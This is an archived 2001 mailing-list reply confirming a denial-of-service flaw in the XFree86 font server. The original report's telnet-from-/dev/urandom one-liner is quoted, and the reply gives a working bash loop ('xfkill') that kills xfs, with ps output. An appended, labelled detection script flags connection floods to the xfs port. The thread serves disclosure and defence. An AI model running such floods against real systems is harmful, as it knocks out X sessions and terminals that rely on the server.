Re: XFree86-xfs-4.0.1-1 DoS

From: Mathias Dybvik (tmdybvikat_private)
Date: Sun Jun 10 2001 - 00:16:42 PDT


    Confirmed, on Mandrake 8.0.
    
    I should, however, point out that I was only able to take down the 
    font-server as a local user, and not from a remote host. This could be a 
    bandwidth problem, caused by the fact that I only have a measly 10Mb/s 
    LAN.
    Then again, my urandom bandwidth is less than half of that, so I'm not 
    sure what gives...
    
    The moral of the story is that (at least) any local user can kill the xfs 
    process. This has dire consequences for any user either using X on that box, 
    or using an x-terminal relying on that fontserver.
    
    [user@userland ~]$ ps -ax|grep xfs
    9363 ?        S      0:00 xfs -port 7100 -daemon -user xfs
    9574 pts/1    S      0:00 grep xfs
    
    [user@userland ~]$./xfkill
    
    [user@userland ~]$ ps -ax|grep xfs
    9626 pts/1    S      0:00 grep xfs
    
    $cat xfkill
    [user@userland ~]$ cat xfkill
    #!/bin/bash
    XFSPORT=7100
    XFS_IP=192.168.1.254
    for ((COUNT=0;COUNT<500;COUNT=$COUNT+1)) do
    echo sending garbage to $XFSPORT pass $COUNT
    telnet $XFS_IP $XFSPORT </dev/urandom &>/dev/null
    done
    
    Version information:
    $ rpm -qi XFree86-xfs
    Name        : XFree86-xfs                  Relocations: (not relocateable)
    Version     : 4.0.3                             Vendor: MandrakeSoft
    Release     : 7mdk                          Build Date: Sun 08 Apr 2001 08
    Install date: Mon 23 Apr 2001 09:32:49 PM UTC      Build Host: bi.mandrake
    Group       : System/Servers                Source RPM: XFree86-4.0.3-7mdk
    Size        : 536213                           License: MIT
    Summary     : Font server for XFree86
    
    
    >>>>>>>>>>>>>>>>>>Original Message <<<<<<<<<<<<<<<<<<
    
    On 6/6/01, 2:31:49 PM, Jarosław Zachwieja <grokat_private> 
    wrote regarding XFree86-xfs-4.0.1-1 DoS:
    
    
    >Hello,
    
    >xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to
    >suffer from a Denial of Service attack.
    >To cause xfs to stop responding to requests, try to do the following:
    
    >$ telnet victim xfs </dev/urandom
    
    >Repeat about 100 (or 1000) times and you get a Connection refused message.
    
    >Regular Xservers can no longer connect, usually crash stating Could not
    >open default font 'fixed' and probably get disabled for 5 minutes if run from
    >inittab.
    
    >I'd appreciate any successful/unsuccessful attempts of reproducing this
    >behaviour.
    
    >Regards,
    >--
    >Valentine M. Smith
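Added example, not part of the original post or thread: a detection sketch for the pattern both messages describe, one source opening on the order of a hundred or more connections to the xfs TCP port in a short time. The log format (`<epoch> <src_ip> <dst_port>`), the 60-second window, the function names and the sample addresses are assumptions made for illustration; the port and the "about 100" threshold come from the thread.

```sh
#!/bin/sh
# Added example: flag sources that open a burst of connections to the xfs port.
# Assumed input, one line per new connection: "<epoch_seconds> <src_ip> <dst_port>"
# (for instance exported from a firewall log; the format is hypothetical).

XFS_PORT=7100    # port shown in the ps listing in the post
THRESHOLD=100    # the thread reports failure after "about 100" connections
WINDOW=60        # seconds; assumed tuning value

# Reads log lines on stdin and prints "<src_ip> <peak_count>" for every source
# whose connections to XFS_PORT reach THRESHOLD inside a sliding WINDOW.
detect_xfs_flood() {
  sort -n -k1,1 | awk -v port="$XFS_PORT" -v thr="$THRESHOLD" -v win="$WINDOW" '
    $3 == port {
      src = $2
      n = ++tail[src]                  # append timestamp to this source queue
      ts[src, n] = $1
      if (!(src in head)) head[src] = 1
      # drop timestamps that have fallen out of the window
      while (ts[src, head[src]] < $1 - win) {
        delete ts[src, head[src]]
        head[src]++
      }
      cnt = n - head[src] + 1
      if (cnt > peak[src]) peak[src] = cnt
    }
    END { for (s in peak) if (peak[s] >= thr) print s, peak[s] }
  ' | sort
}

# Constructed sample data: 192.168.1.50 makes 500 connections in 50 seconds,
# 192.168.1.77 behaves like an X terminal fetching fonts every 30 seconds.
sample_log() {
  awk 'BEGIN {
    base = 992156400
    for (i = 0; i < 500; i++) print base + int(i / 10), "192.168.1.50", 7100
    for (i = 0; i < 5; i++)   print base + i * 30, "192.168.1.77", 7100
    print base + 10, "192.168.1.50", 22   # other port, ignored
  }'
}

sample_log | detect_xfs_flood   # prints: 192.168.1.50 500
```

Because the first message reports that the font server also falls to a local user, a per-source count taken at a network boundary will not see connections made on the host itself; those have to be logged on the xfs host.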
    



    This archive was generated by hypermail 2b30 : Sun Jun 10 2001 - 17:18:23 PDT